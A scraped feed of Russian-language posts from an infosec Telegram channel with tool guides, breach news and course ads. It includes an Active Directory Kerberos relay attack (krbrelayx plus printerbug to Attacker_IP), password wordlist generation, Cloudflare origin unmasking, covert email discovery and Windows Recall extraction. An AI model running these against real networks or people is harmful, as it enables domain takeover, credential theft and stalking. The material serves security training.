codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

WhatsMyName: как найти цифровой след человека за пару кликов 🔍

WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя.
Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей.

Что делает WhatsMyName
Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки.
Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах.
Результат — список ресурсов, где этот username уже занят или существует.
И этого более чем достаточно, чтобы начать раскрутку личности.

Через WhatsMyName можно:
➡️ связать аккаунты человека на разных платформах
➡️ найти старые или забытые профили
➡️ определить интересы, профессию, хобби
➡️ подготовить фишинговую атаку или социальную инженерию
➡️ собрать профиль цели для дальнейшего OSINT

Для пентестера — инструмент.
Для журналиста — источник.
Для сталкера — оружие.
Для обычного пользователя — повод задуматься.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️

Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.

ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.


Какие данные скомпрометированы
По подтверждённой информации, в утечке присутствуют:
🟠 email-адреса пользователей
🟠 история просмотров
🟠 поисковые запросы
🟠 ссылки и названия видео
🟠 метаданные пользовательской активности
Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя.

🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года.

🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность.
Но в реальности этот инцидент — ещё одно напоминание:
если данные куда-то отправляются — значит, однажды они могут утечь

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

SSLScan: Инструмент для аудита SSL/TLS конфигураций

SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.


💛Возможности
- Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3)
- Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере
- Тестирование порядка предпочтения шифров со стороны сервера
- Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple
- Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation)
- Возможность сканирования виртуальных хостов, использующих SNI
- Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах

💛Установка
sudo apt install sslscan
Проверка
sslscan -h

💛Базовое сканирование хоста
sslscan example.com
Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443

💛Сканирование с указанием порта
sslscan example.com:8443
Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах

💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)
sslscan --tls13 --tls12 example.com

💛Тестирование всех поддерживаемых шифров без проверки сертификата
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com
Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра

💛Сохранение отчета в формате XML
sslscan --xml=report.xml example.com

💛Недостатки
⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным
- Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку
- Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory

Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.


🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory:
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки

🟧Установка
sudo apt install krbrelayx

Проверяем
krbrelayx -h


🟧Переходим в директорию проекта и устанавливаем зависимости
cd krbrelayx
pip install -r requirements.txt


🟧Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)

2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$

В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.

🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Namechk: Ваш Шерлок Холмс в мире цифровых следов и как защититься от его "темной стороны"

🔍Открытые данные — это пазл, который можно собрать в целостную картину о человеке или компании. Инструменты вроде Namechk превращают поиск по никнейму из рутинной задачи в мощный метод цифровой разведки.

Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.

Вы узнаете, как:
💠Быстро находить профили по никнейму — автоматизируйте проверку сотен платформ за минуту. Узнаете, где ваш «старый» аккаунт уже фигурирует в слитых базах, и как это используют для фишинга и социальной инженерии.

💠Снизить риски кибератак — защитите бренд от фейков и клонов. Научитесь выявлять поддельные корпоративные аккаунты и страницы ключевых сотрудников, созданные для мошенничества.

💠Проводить аудит своей цифровой уязвимости — получите пошаговый метод, как оценить, что о вас или вашей компании знают в сети. Поймёте, какую информацию стоит скрыть, чтобы минимизировать риски.

Хотите погрузиться в тему глубже и начать применять OSINT на практике? 📌Читайте полную статью с детальными инструкциями и реальными примерами.

↖️Готовы превратить отдельные инструменты OSINT в цельное расследование? Ждём вас на курсе «OSINT: технология боевой разведки». Старт 26 января!

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

👀 TotalRecall

Инструмент извлекает и отображает данные из Windows Recall, предоставляя удобный способ доступа к информации о снимках активности вашего ПК.

Windows Recall — это функция Microsoft, впервые представленная в 2024 году, которая автоматически делает снимки того, что происходит на экране ПК каждые пять секунд, если содержимое экрана отличается от предыдущего снимка, и сохраняет их в локальной базе данных.

Функция Recall позволяет искать контент, включая изображения и текст, с помощью естественного языка. Является частью экосистемы Copilot+ PC и интегрирована в Windows 11 и новую AI-платформу Microsoft.


Особенности

🔴Поддерживает фильтрацию по дате;
🔴Текстовый поиск конкретного значения;
🔴Предоставляет исчерпывающие отчеты.

🔴 Технические детали
Windows Recall хранит все данные локально в незашифрованной базе данных SQLite, а скриншоты просто сохраняются в папке на вашем компьютере по пути:
C:\Users\$USER\AppData\Local\CoreAIPlatform.00\UKP\{GUID}


Все изображения хранятся в следующей подпапке .\ImageStore\.
База данных ukg.db имеет относительно простую структуру, но содержит огромное количество информации.

Как работает инструмент
1️⃣TotalRecall копирует базу данных ukg.db и папку ImageStore в указанную папку для извлечения. Это гарантирует, что исходные данные останутся нетронутыми, пока вы будете изучать извлечённые данные.

2️⃣Анализирует базу данных SQLite, чтобы извлечь потенциально интересные артефакты, такие как заголовки окон, временные метки и токены изображений. Инструмент ищет записи, соответствующие заданным вами критериям (например, диапазону дат или поисковым запросам).

3️⃣Переименовывает файлы изображений в папке ImageStore с расширением .jpg, если оно ещё не присвоено. Это упрощает просмотр снимков экрана и управление ими.

4️⃣Позволяет искать определённые термины в базе данных, используя возможности оптического распознавания символов (OCR) в Windows Recall. Это значит, что вы можете найти текст, который был на вашем экране, даже если он был на изображении.

5️⃣Инструмент формирует сводку извлечённых данных, включая количество захваченных окон и сделанных снимков. Он также создаёт подробный отчёт в текстовом файле, в котором перечислены все захваченные данные и результаты поиска.

👁️Примеры использования
totalrecall.py [-h] [--from_date FROM_DATE] [--to_date TO_DATE] [--search SEARCH]


Поиск упоминаний термина password в период с 2024-06-04 по 2024-06-05.
totalrecall.py --search password --from_date 2024-06-04 --to_date 2024-06-05


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

BBOT — мощный автоматизированный сканер для Recon, Bug Bounty и ASM

BBOT — мультифункциональный сканер, вдохновлённый Spiderfoot, созданный для автоматизации разведки, поиска поддоменов, web-сканирования и анализа атакуемой поверхности. Инструмент сочетает мощные модули, находит значительно больше данных, чем классические OSINT-инструменты, и масштабируется под любые задачи.


Основные возможности BBOT
➡️ Поиск поддоменов — комбинирует пассивные источники, рекурсивный brute-force и AI/NLP-мутации, находя на 20–50% больше результатов.
➡️ Web Spider — обход сайтов, сбор e-mail, URL, параметров, секретов.
➡️ Email-enum — быстрый сбор почтовых адресов из API и контента.
➡️ Web-сканы — лёгкий (web-basic) и расширенный (web-thorough).
➡️ Kitchen-Sink режим — запуск всех модулей сразу.
➡️ Огромный выбор выводов — Neo4j, Elastic, Splunk, SQL/NoSQL, Slack, Discord, JSON/CSV и др.
➡️ Python API — синхронная и асинхронная работа для полной автоматизации.

⬇️ Установка
pipx install bbot
# dev-ветка:
pipx install --pip-args '--pre' bbot


🔌 Примеры команд
⏺️Subdomain enum:
bbot -t evilcorp.com -p subdomain-enum


⏺️Spider:
bbot -t evilcorp.com -p spider


⏺️Email-enum:
bbot -t evilcorp.com -p email-enum


⏺️Web-скан:
bbot -t www.evilcorp.com -p web-basic


⏺️Все сразу:
bbot -t evilcorp.com -p kitchen-sink --allow-deadly



🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🎄 Что подарить на Новый год тому, кто в теме? В Академии Кодебай открылись продажи новогодних подарочных сертификатов!

Если вы ищете подарок, который действительно имеет ценность — мы создали его.
Теперь вы можете подарить близкому человеку не вещь, а возможность изменить профессию, усилить навыки и выйти на новый уровень.

🎁 Премиальный подарок для будущего профессионала.
🎁 Практичный выбор для тех, кто ценит развитие.
🎁 Подарок с долгосрочной ценностью.

Выберите формат:
↖️ Сертификат на один курс
↖️ Сертификат-номинал

Получатель сам выбирает направление обучения: от веб-пентеста и SOC до самых свежих новинок — DevSecOps и Appsec-инженер!

Сертификат приходит на e-mail в виде стильного PDF, который можно красиво вручить лично или отправить онлайн.

⬇️ Продажи уже открыты.

Читать полностью…

Codeby

🛠 В данный момент платформа подвергается беспрецедентной целенаправленной DDoS-атаке.

➡️Мы продолжаем работы по стабилизации и планируем запустить соревнования в 18:00 МСК. Продолжительность соревнований будет скорректирована - никто не потеряет игровое время.

🎁 Все участники получат приятные бонусы.

Благодарим за терпение и понимание ❤️

Читать полностью…

Codeby

⚒️ Утечка данных в Leroy Merlin: клиенты снова на линии огня

Французский ритейлер Leroy Merlin сообщил клиентам о новом инциденте безопасности — и да, снова персональные данные утекли туда, куда не должны были. На этот раз жертвами стали пользователи из Франции, а сама атака, по словам компании, была «точечной, но неприятной».

Информация о произошедшем появилась после того, как пользователь SaxX_ опубликовал в X фрагменты уведомления, разосланного клиентам. Согласно документу, злоумышленники сумели получить доступ к целому набору данных, которые обычно собирают маркетологи, но обожают киберпреступники:
🔴полное имя
🔴номер телефона
🔴электронная почта
🔴почтовый адрес
🔴дата рождения
🔴данные из программы лояльности

То есть полный пакет для фишинговых атак, подмены личности и прочей социальной инженерии, которая в последнее время стала хитом среди злоумышленников.

В обращении компания признаёт факт взлома:

«Недавно на нашу информационную систему была совершена кибератака, и часть ваших персональных данных могла быть скомпрометирована. Как только инцидент был обнаружен, мы заблокировали несанкционированный доступ и локализовали угрозу».

При этом ритейлер подчёркивает, что банковские данные и пароли не пострадали. Хорошая новость? В теории — да. На практике — украденной информации уже достаточно, чтобы клиентам пришлось держать уши (и почту) востро.

Интересный момент: пока что украденные данные нигде не всплывали, и в компании уверяют, что злоумышленники ещё не использовали их для атак. Это может означать, что база не попала в даркнет — либо кто-то просто готовит её к более тонкой, персонализированной работе.

На данный момент ни одна хакерская группировка не взяла на себя ответственность

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Metis — AI-driven инструмент для глубокого анализа безопасности кода

Metis — инструмент от Arm для анализа безопасности кода. Это open-source решение с ИИ-движком, которое помогает находить скрытые уязвимости, снижать нагрузку на ревьюеров и упрощать разбор сложных или устаревших кодовых баз.


⚡️ Основные возможности Metis
😡 Глубокий security code review — Metis анализирует контекст, логику, зависимости и взаимодействие модулей, находя проблемы, которые часто пропускают линтеры и SAST-решения.
😡 ИИ-поддержка — встроенные модели помогают выявлять нетривиальные дефекты, подозрочные паттерны и потенциальные цепочки атаки.
😡 Работа с большими и legacy-проектами — Metis особенно эффективен там, где кодовая база сложная, исторически разросшаяся или плохо документирована.
😡 Удобный процесс ревью — подсветка рисков, генерация объяснений, рекомендации по исправлению и снижение «усталости ревьюера».
😡 Автоматизация и гибкость — инструмент можно интегрировать с CI/CD, запускать локально или применять как часть пайплайна безопасной разработки.

⬇️ Установка и запуск
⏺️Клонирование проекта и установка зависимостей:
git clone https://github.com/arm/metis.git
cd metis
pip install -r requirements.txt


⏺️Запуск анализа:
python3 metis.py --source /path/to/codebase


⏺️Использование в CI/CD:
Metis можно встроить в GitHub Actions, GitLab CI или локальные пайплайны, вызывая тот же CLI.
Пример работы в CI:
python3 metis.py --source . --output report.json


В репозитории есть примеры конфигураций, моделей и сценариев анализа — изучайте папку /examples/ и адаптируйте Metis под свои процессы безопасной разработки.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Threat Hunting

🏹 Threat Hunting (охота за угрозами) — это проактивный, систематический и итеративный процесс активного поиска скрытых киберугроз и следов компрометации в IT-инфраструктуре, которые не были обнаружены стандартными автоматическими средствами защиты (например, SIEM, IDS/IPS).

❗️ Его суть — не ждать срабатывания алертов, а активно искать признаки вредоносной активности, используя опыт, знания и аналитику.

Основные характеристики
🔺 Проактивность: специалист не ждет инцидентов, а самостоятельно формирует гипотезы о возможных способах проникновения и действиях злоумышленников в сети.
🔺 Итеративность: процесс включает многократное выдвижение и проверку гипотез. Если первоначальная гипотеза не подтвердилась, она модифицируется и тестируется снова.
🔺 Телеметрия: анализируются данные, собираемые с конечных точек, сетевых сенсоров, журналов безопасности и прочих источников.
🔺 Использование Threat Intelligence: специалисты применяют актуальную информацию о тактиках, техниках и процедурах (TTP) известных атакующих, индикаторы компрометации (IOC), чтобы направлять свои поиски.

🎯 Цель — выявить скрытые проникновения, сложные целевые атаки (APT), которые могут длительное время оставаться незамеченными традиционными средствами, особенно когда атаки распределены во времени и замаскированы.
➡️ Результат — сокращение времени выявления инцидентов, повышение уровня защиты и понимания инфраструктуры.

В общем виде процесс Threat Hunting:
🔺 Формирование гипотезы на основе знаний о современных угрозах и особенностях инфраструктуры.
🔺 Поиск следов активности или аномалий с помощью анализа телеметрии.
🔺 Проверка и подтверждение гипотезы, выявление угроз.
🔺 Обратная связь и обновление гипотез при получении новых данных.

Как часто используете процессы Threat Hunting в своей работе?

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Pydictor

Мощный и полезный конструктор хакерских словарей для Bruteforce.
Он не только умеет создавать продвинутые словари паролей, но и предлагает полезные функции по их обработке: объединение, удаление дубликатов, фильтрация и т.д.

📕Характеристики:
Генерация 7 типов словарей: базовые, с пользовательским набором символов, комбинаторика и др.
8 утилит для работы со словарями: объединение, удаление дубликатов, сравнение, подсчёт частот и пр.
Поддержка 6 специализированных словарей: по дате рождения, ID, FTP-паролям и т.д.
Встроенные методы кодирования и хеширования: base64, md5, sha и др.
Гибкая фильтрация по длине, регуляркам, типам символов и другим критериям

💻Установка:

git clone https://github.com/LandGrey/pydictor

cd pydictor


📌Использование:
Основной словарь:
python pydictor.py -base L --len 2 3 --encode b64

python pydictor.py -base dLc --len 1 3 -o /awesome/pwd


Пользовательский словарь с набором символов:
python pydictor.py -char "asdf123._@ " --len 1 3 --tail @site.com


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

В ИБ многие навыки усиливают друг друга, и обучение в связке даёт заметно более быстрый прогресс.

Поэтому до 19 декабря мы дарим промокод COMBO20, по которому можно взять любые два курса со скидкой –20%.

Это хороший вариант тем, кто хочет закрыть смежные навыки сразу.

〰️〰️ Атака + защита? Легко.
〰️〰️ Основа + углубление? Ещё проще.
〰️〰️ Закрыть пробелы и победить в CTF? Тоже можно.

Любые два курса можно комбинировать — комбо работает на все направления! Отправляйте промокод менеджеру и начинайте учиться сейчас!

⚡️ Чат с менеджером

Читать полностью…

Codeby

Cortex

🧠 Cortex — это платформа автоматизации и оркестрации безопасности класса SOAR (Security Orchestration, Automation, and Response), которая позволяет значительно повысить эффективность работы SOC и команд реагирования на инциденты.

Основные возможности Cortex:
🔺 Автоматизация процессов реагирования на инциденты за счет сценариев (playbook), которые могут запускать анализ, принимать решения и выполнять коррекционные действия без участия аналитиков.
🔺 Оркестрация различных инструментов безопасности: NGFW, EDR/XDR, DLP, Sandbox и др. Позволяет интегрировать разные системы в единый процесс.
🔺 Аналитика и классификация инцидентов с автоматическим отсеиванием ложных срабатываний и назначением приоритетов.
🔺 Гибкая поддержка скриптов на Python, JavaScript и PowerShell для создания кастомных автоматизированных действий.
🔺 Встроенный «помощник» для создания скриптов, что облегчает использование платформы даже специалистам с базовыми навыками программирования.
🔺 Единая консоль для управления инцидентами с возможностью изолировать конечные точки, запускать корреляционные процедуры и документировать расследования.
🔺 Возможность генерации тестовых инцидентов для отработки процедур и тренировок команды.
🔺 Поддержка интеграций со многими решениями Palo Alto Networks и сторонними продуктами безопасности.

🖥 Cortex активно используют совместно с другими платформами, как обогащение инцидентов. Происходит это следующим образом:
🔺 При регистрации инцидента автоматически запускается playbook, который параллельно выполняет множество действий по обогащению.
🔺 Выполняется проверка артефактов (файлов, хэшей, IP-адресов, доменов) в различных системах и сервисах, таких как VirusTotal, платформы Threat Intelligence, SIEM и др.
🔺 Производится анализ логов на наличие индикаторов компрометации (IoC), собирается дополнительная информация об активности на связанных хостах и учетных записях.
🔺 Полученные данные добавляются в карточку инцидента, что позволяет видеть полный контекст и принимать обоснованные решения.
🔺 Обогащение помогает либо подтвердить ложные срабатывания, либо выявить расширенные последствия и масштаб инцидента.
📌 А как вы используете Cortex в своей работе?

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

CloakQuest3r

CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare.

📕Характеристика:
Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare.
Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов.
История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена.
Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом.
Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность.

💻Установка:

git clone https://github.com/spyboy-productions/CloakQuest3r.git

cd CloakQuest3r


📌Запуск:
python cloakquest3r.py example.com


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Mailcat

Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.

📕Характеристики:
Удобный интерфейс
Поддержка tor
Поддержка proxy

💻Установка:

git clone https://github.com/sharsil/mailcat.git

cd mailcat

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 mailcat.py <NICKNAME>

Запуск с tor:
python3 mailcat.py --tor <NICKNAME>

Запуск с proxy:
proxychains4 -q python3 mailcat.py <NICKNAME> 

или
python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.

Посмотрим, как это происходит на практике. ⬆️


Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

По всем вопросам пишите
⚡️ @Codeby_Academy
➡️ Все наши каналы 💬Все наши чаты

Читать полностью…

Codeby

🟧 uncover

Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.

Обладает следующими характеристиками

🟧Одновременный запрос к нескольким поисковым системам;
🟧Поддержка доступных поисковых систем: Shodan, Censys, FOFA, Hunter, Quake, ZoomEye, Netlas, CriminalIP, PublicWWW, HunterHow, Google, Onyphe, Driftnet;
🟧Поддерживает ввод нескольких ключей API;
🟧Автоматическая рандомизация ключей API;
🟧Вывод uncover можно перенаправить в другие проекты в рамках рабочего процесса, принимающие stdin в качестве входных данных (например, uncover -q example -f ip | naabu).

Для успешной установки требуется go1.21.

 
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest


Файл конфигурации находится по пути $CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:

Если в файле конфигурации указано несколько ключей/учетных данных для одного и того же провайдера, для каждого выполнения будет использоваться случайный ключ.

🟧Использование
Поддерживает несколько способов выполнения запроса, включая stdin или флаг -q. По умолчанию для поиска используется shodan.
echo 'ssl:"Uber Technologies, Inc."' | uncover


Флаг -e можно использовать для выполнения одного и того же запроса в любой или во всех поисковых системах.
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet


Поддерживает использование driftnet API для быстрого поиска открытых портов по заданному IP-адресу или CIDR-адресу.
echo 8.8.8.8/20 | uncover -e driftnet


Перенаправление вывода uncover в httpx в качестве входных данных.
uncover -q http.title:GitLab -silent | httpx -silent


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Findsploit

Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.

💻Установка:

git clone https://github.com/1N3/Findsploit.git

cd Findsploit


📌Запуск:
./findsploit

Найдите все эксплойты и модули, используя один поисковый запрос:
./findsploit <WORD> (например apache)

Поиск по нескольким поисковым запросам:
./findsploit <WORD> <WORD>

Показать все эксплойты Metasploit:
./findsploit exploits


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🟧🟧🟧🟧 Мы запускаем флагманскую программу по Application Security!

AppSec — одно из самых востребованных и быстрорастущих направлений в кибербезопасности.
И теперь у нас есть полный 7-месячный практический курс, который готовит к работе в реальных проектах — от поиска уязвимостей до внедрения безопасного SDLC и DevSecOps.

Что ждёт на программе?
🟧 200+ часов практики
🟧 Личный стенд: SQLi, XSS, SSRF, LFI, IDOR, Race Condition и др.
🟧 Работа с SAST (Semgrep), DAST (Burp/ZAP/OAST), SCA (Trivy)
🟧 Secure SDLC, Threat Modeling, CVE/CWE/CVSS
🟧 Автоматизация безопасности в CI/CD
🟧 Финальный capstone: mini-CTF, созданный своими руками
🟧 Большое портфолио из 9 проектов, закрывающее требования junior-вакансий

🎓 По итогам — диплом о профпереквалификации и готовность выйти на рынок как:
Junior/Middle AppSec Engineer, Web-Pentester, Security Developer, DevSecOps-инженер.

Старт: 16 февраля
🟧🟧🟧 Первый поток доступен со скидкой 10%: 120.000 руб. 108.000 руб.

Набор открыт:
🟧 https://codeby.school/appsec.html

Читать полностью…

Codeby

Б — безопасность, значит, д — доверие.

В VK специалисты ИБ создают защиту, которая работает незаметно, но надёжно. Узнайте из первых уст, как строится их работа. Переходите по ссылке — читайте про цели, миссию и команду, которая стоит на страже цифрового пространства.

Читать полностью…

Codeby

🟧Короткий разбор, как работает MFA и почему разные способы защиты дают разный уровень безопасности.

А какой метод используете вы — и считаете ли его достаточно надёжным?


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🚩 Соревнования начались!

Всем участникам желаем удачи и ярких эмоций ❤️

➡️ https://hackerlab.pro/cybercoliseum
———————————————
Следить за ходом соревнований без регистрации можно по ссылке: https://hackerlab.pro/scoreboard

Читать полностью…

Codeby

PatchLeaks: Анализ патчей и обновлений через веб-интерфейс

PatchLeaks — это серверный инструмент, написанный на языке Go, предназначенный для анализа патчей, обновлений безопасности и связанных данных через веб-интерфейс. Он использует многопоточную обработку с элементами искусственного интеллекта для глубокого изучения предоставленной информации. Инструмент запускается как автономный веб-сервер, предоставляя исследователям и аналитикам платформу для интерактивного анализа изменений в обновлениях ПО, выявления скрытых модификаций и потенциальных уязвимостей.


🟡Представляет собой скомпилированное Go-приложение, работающее как самостоятельный веб-сервер
🟡Использует многопоточность для эффективного анализа данных с применением алгоритмов искусственного интеллекта
🟡Позволяет настраивать IP-адрес привязки и порт сервера, включая использование случайного свободного порта
🟡Предназначен для работы с данными, характерными для процесса исправления ПО: описаниями изменений, diff-файлами, метаданными обновлений

➡️Установка
sudo apt install patchleaks

Скачиваем зависимости Go
go mod download

Эта команда создаст исполняемый файл patchleaks (или patchleaks.exe на Windows) в текущей директории
go build -o patchleaks .

Проверяем
patchleaks -h

➡️Запустим веб-сервер на localhost (127.0.0.1) на случайном свободном порту
patchleaks

➡️Запустим сервер на всех сетевых интерфейсах на порту 8080 с использованием 4 потоков для обработки ИИ
patchleaks -host "0.0.0.0" -p 8080 -t 4

‼️Процесс использования
- Убедитесь, что выполнили шаги go mod download и go build
- Выполните команду запуска сервера с нужными параметрами
- В консоли отобразится адрес веб-сервера (например, Server URL: http://0.0.0.0:8080). Откройте этот адрес в браузере
- Используйте веб-интерфейс для загрузки и анализа данных, связанных с обновлениями ПО

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Google В С Ё

Член комитета Госдумы по информационной политике Андрей Свинцов допустил, что в России под ограничения могут попасть все сервисы Google.
